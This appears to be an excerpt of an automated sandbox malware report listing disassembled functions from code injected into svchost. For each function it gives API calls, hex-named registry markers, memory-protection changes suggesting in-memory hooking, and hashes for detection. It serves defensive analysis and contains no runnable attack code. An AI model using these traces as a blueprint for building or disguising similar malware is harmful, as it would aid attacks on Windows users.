                                                                                                                                                                                                            Function 02C832F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 125registrymemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C832FA
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83330
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02C83357
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02C8337A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02C833ED
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C833F4
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83404
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02C83432
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 1484339481-3673152959
                                                                                                                                                                                                            • Opcode ID: ffc6f798f5a69eaf18ca008539c899796092b0a2bde6652e46702e492edf175d
                                                                                                                                                                                                            • Instruction ID: 23968d54473004be1a826ad79e5164d9663e5341a45f5565242fb56e15f19d55
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffc6f798f5a69eaf18ca008539c899796092b0a2bde6652e46702e492edf175d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A141C832E001999BDB26DA649D09FDABBB89FC1F08F0491D5ED44A7100DB70DB058BA1
                                                                                                                                                                                                            Function 02C73830 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 86COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SymGetModuleBase.DBGHELP(00000000,?,?,?), ref: 02C73889
                                                                                                                                                                                                            • SymGetModuleInfo.DBGHELP(00000000,00000000,0000023C), ref: 02C7389C
                                                                                                                                                                                                            • SymGetSymFromAddr.DBGHELP(00000000,?,?,00000018), ref: 02C738B3
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C738DD
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C73901
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                            • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                            • API String ID: 844136142-2194319270
                                                                                                                                                                                                            • Opcode ID: debc5e9f8d230d550c85161a7568315a262fbd6eb95dd6f97c25237b9e36c290
                                                                                                                                                                                                            • Instruction ID: ee176164c65198b71dffdc2ec012dc55a2265955e45dc6228db0b5408bef8a28
                                                                                                                                                                                                            • Opcode Fuzzy Hash: debc5e9f8d230d550c85161a7568315a262fbd6eb95dd6f97c25237b9e36c290
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F212372A00198ABE7229E48DC84FFA73ACEF84700F0481D9F809A7140E7719B58DBA1
                                                                                                                                                                                                            Function 02C822C0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C822C8
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,02C859A4), ref: 02C822FF
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,92F35CFEa,00000000,02C859A4,00000000,?,?,02C859A4), ref: 02C8231C
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,02C859A4), ref: 02C82326
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,02C859A4), ref: 02C82359
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,92F35CFEa,00000000,?,00000000,02C859A4,?,02C859A4), ref: 02C82376
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,02C859A4), ref: 02C82380
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 92F35CFEa$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-1533605276
                                                                                                                                                                                                            • Opcode ID: 922c61293b1bee8923d5a58eb8ce59a7f9aa4d8ab9767407fe72cab3fee6937f
                                                                                                                                                                                                            • Instruction ID: 017e78e4adb00e4484c9c3d064383ffddcd4098467c60a2a5b0605639de4f87d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 922c61293b1bee8923d5a58eb8ce59a7f9aa4d8ab9767407fe72cab3fee6937f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD214175E40249FBEB01DBA4DC89FEEBBBCEF44704F104A99E905E7140E7B4A6049B54
                                                                                                                                                                                                            Function 02C88B10 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C88B18
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02C88CD7), ref: 02C88B4F
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(02C88CD7,92f35cb6a,00000000,?,00000000,?), ref: 02C88B6C
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(02C88CD7), ref: 02C88B76
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C88BA9
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,92f35cb6a,00000000,?,00000000,?), ref: 02C88BC6
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C88BD0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 92f35cb6a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-1370861648
                                                                                                                                                                                                            • Opcode ID: 4493a33fad6a26744ab4a4528b16f271d32d37bc836a139fb56fbdcd00241282
                                                                                                                                                                                                            • Instruction ID: b7628371782cf1d20c53189bd053dcf2845de122ac2e73c2e3bb5e58df35ebe3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4493a33fad6a26744ab4a4528b16f271d32d37bc836a139fb56fbdcd00241282
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28211DB5E4020DBBEB01DBA4DD85FEEBBB8EF88704F104699E501E7140E7B4A6058B94
                                                                                                                                                                                                            Function 02C73430 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C73438
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02C7346F
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,92f35d24a,00000000,?,00000000,?), ref: 02C7348C
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C73496
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C734C9
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,92f35d24a,00000000,?,00000000,?), ref: 02C734E6
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C734F0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 92f35d24a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-2691776517
                                                                                                                                                                                                            • Opcode ID: 59d1c569bf5b2a2a0fe74698599c5955ffa94a4e28bbbf7d3ca57d0a61403491
                                                                                                                                                                                                            • Instruction ID: 110012369a30d37c7ac43815baab101445165a89ae5d46bcb92c0ad8cd912cb6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59d1c569bf5b2a2a0fe74698599c5955ffa94a4e28bbbf7d3ca57d0a61403491
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8214F75E40249FBEB15CBA4DC85FEEBBB8EF48700F104699E601E7140E7B4A6059B94
                                                                                                                                                                                                            Function 02C97530 Relevance: 15.4, APIs: 8, Strings: 2, Instructions: 394COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: /$UT
                                                                                                                                                                                                            • API String ID: 0-1626504983
                                                                                                                                                                                                            • Opcode ID: 8cd8e28024db2c1f05ee53f4d77104ea95a04d678365f7f3ae8722546a6db83a
                                                                                                                                                                                                            • Instruction ID: 0b87090530d4187549a361d6e0166cc7633a992d6cb982bd84a68858742b5c18
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cd8e28024db2c1f05ee53f4d77104ea95a04d678365f7f3ae8722546a6db83a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EF190B1A152588BCF25CF69D8847EDFBB5EF84304F1485DAE808AB241D7719B88CF91
                                                                                                                                                                                                            Function 02C97B50 Relevance: 15.1, APIs: 10, Instructions: 97memoryfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75495CE0,?,02C82840,?), ref: 02C97B63
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,02C82840,?), ref: 02C97B66
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C97B7B
                                                                                                                                                                                                            • CreateFileA.KERNEL32(02C82840,40000000,00000003,00000000,00000002,00000080,00000000,?,02C82840,?), ref: 02C97BD2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97BF5
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C82840,?), ref: 02C97BF8
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97C04
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C82840,?), ref: 02C97C07
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000010,?,02C82840,?), ref: 02C97C1A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02C82840,?), ref: 02C97C1D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocAllocateCreateFileFreeValidatememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 529598968-0
                                                                                                                                                                                                            • Opcode ID: f9ec8668f9f27af3536a84382f41d06f747a31da70293c8ab9c2a57ac8ed06ec
                                                                                                                                                                                                            • Instruction ID: a6b2414cb3c24528592f7f4772f15661689a7160a35fdfdeb1d03fa4dc6205d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9ec8668f9f27af3536a84382f41d06f747a31da70293c8ab9c2a57ac8ed06ec
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9315EF19467449FDB319F669C88B12FBE8FF84714F00892EE28A97641C370A544CBA1
                                                                                                                                                                                                            Function 02C831A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114registrymemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C831D4
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000104,software\microsoft,00000000,00000101,80000002,?,75570F10,00000000), ref: 02C831F7
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(80000002,?,00000000,00000001,00000000,00000104,?,75570F10,00000000), ref: 02C8321A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015,?,75570F10,00000000), ref: 02C8328D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,75570F10,00000000), ref: 02C83294
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C832A4
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000002,?,75570F10,00000000), ref: 02C832D2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heapmemset$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 4043890984-3673152959
                                                                                                                                                                                                            • Opcode ID: 938e5983cb5dc41a3770d10e2b755d0cd0f9b5e85c28e557abdbd5e662052f64
                                                                                                                                                                                                            • Instruction ID: da9891e3be98d4c1a52e2c2ed95cd7b6662a5d391b76b87e312ac4960b0d8925
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 938e5983cb5dc41a3770d10e2b755d0cd0f9b5e85c28e557abdbd5e662052f64
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F31C832E042DDABCB22DB649C08BDB7BB8AFC5B08F0586D4ED5497101D770DB498B91
                                                                                                                                                                                                            Function 02C89230 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72memorysynchronizationsleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8), ref: 02C8924B
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02C89298
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02C892C7
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000), ref: 02C892CE
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02C892E2
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 02C892F9
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C89301
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 842647815-465009422
                                                                                                                                                                                                            • Opcode ID: 61f986011ddaad9f9f5d0b6dbd3188fa6f5d00b2d0960e879eb0c59615c09e50
                                                                                                                                                                                                            • Instruction ID: 776aa29ac6adfd7372a221d914691c6ac6f9cd4e1b74a4149aa9d8fb52a3ef11
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61f986011ddaad9f9f5d0b6dbd3188fa6f5d00b2d0960e879eb0c59615c09e50
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A215A75A40201EFD725DF55D888F66B7A9FB88714F04CA48E60697790CB30F954CB91
                                                                                                                                                                                                            Function 02C88BF0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C88BF7
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C88C09
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,?,?,?,?,02C88DC2), ref: 02C88C23
                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(?,92f35cb6a,00000000,00000004,?,00000004,software\microsoft,00000000,00000102,?,?,?,?,02C88DC2), ref: 02C88C40
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?,?,?,?,02C88DC2), ref: 02C88C4A
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,02C88DC2), ref: 02C88C54
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                            • String ID: 92f35cb6a$software\microsoft
                                                                                                                                                                                                            • API String ID: 287100044-1370861648
                                                                                                                                                                                                            • Opcode ID: af3d3c3d917ee86980ea8899395568b370373d70d68ad8fb6a81ea8d3a2bf517
                                                                                                                                                                                                            • Instruction ID: b19634f42ef7c3292fa34f6bbd09172dabb954f0f2e18e5e67ba2428723a9bd0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: af3d3c3d917ee86980ea8899395568b370373d70d68ad8fb6a81ea8d3a2bf517
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAF03175D80258FBD701DBA0AD49F9A7B3CAF04701F104795FA06A3180D6709A1587A4
                                                                                                                                                                                                            Function 02C93E40 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C93E6F
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02C93EA8
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C93F13
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C93F76
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                            • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$6D1DA380$92F35C2Aa
                                                                                                                                                                                                            • API String ID: 2823094833-1580445031
                                                                                                                                                                                                            • Opcode ID: 56d286c8fbf1fcafa5865725b26843ec90a64cb741d60294705bbd3a10ff8e41
                                                                                                                                                                                                            • Instruction ID: e0cbaeed9ecfb537269936f1a9088f204baa542f2f80854772de925ea2260573
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56d286c8fbf1fcafa5865725b26843ec90a64cb741d60294705bbd3a10ff8e41
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE4125B2E00199ABDB15CB688D88BEEF7FEEF94300F1502E4E545AB280D7716B458780
                                                                                                                                                                                                            Function 02C848B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C848D8
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,92f35bc3a,00000000,00000000,00000000,?), ref: 02C8491A
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 02C84924
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(-80000001), ref: 02C848EA
                                                                                                                                                                                                              • Part of subcall function 02C73430: IsUserAnAdmin.SHELL32 ref: 02C73438
                                                                                                                                                                                                              • Part of subcall function 02C73430: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02C7346F
                                                                                                                                                                                                              • Part of subcall function 02C73430: RegQueryValueExA.ADVAPI32(?,92f35d24a,00000000,?,00000000,?), ref: 02C7348C
                                                                                                                                                                                                              • Part of subcall function 02C73430: RegCloseKey.ADVAPI32(?), ref: 02C73496
                                                                                                                                                                                                              • Part of subcall function 02C73430: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C734C9
                                                                                                                                                                                                              • Part of subcall function 02C73430: RegQueryValueExA.KERNEL32(?,92f35d24a,00000000,?,00000000,?), ref: 02C734E6
                                                                                                                                                                                                              • Part of subcall function 02C73430: RegCloseKey.ADVAPI32(?), ref: 02C734F0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 92F3547Aa$92f35bc3a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-3269791993
                                                                                                                                                                                                            • Opcode ID: 66b96ee46b1c71e43464b0cad1529f1feb87841dee9d931c06d73110e0bc9115
                                                                                                                                                                                                            • Instruction ID: 3be5ce622da499e016b5904651f4a545f69ed32f49199a27d74f66c8fb0bfc8c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66b96ee46b1c71e43464b0cad1529f1feb87841dee9d931c06d73110e0bc9115
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA0152B5E90249ABDB14DBB4DC45FAE77BCEF44714F104B98F515E7180E77496008B90
                                                                                                                                                                                                            Function 02C88FC0 Relevance: 12.1, APIs: 8, Instructions: 139memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7556F550,00000000,76C0BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,02C8839A,?,?,?,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000), ref: 02C890FA
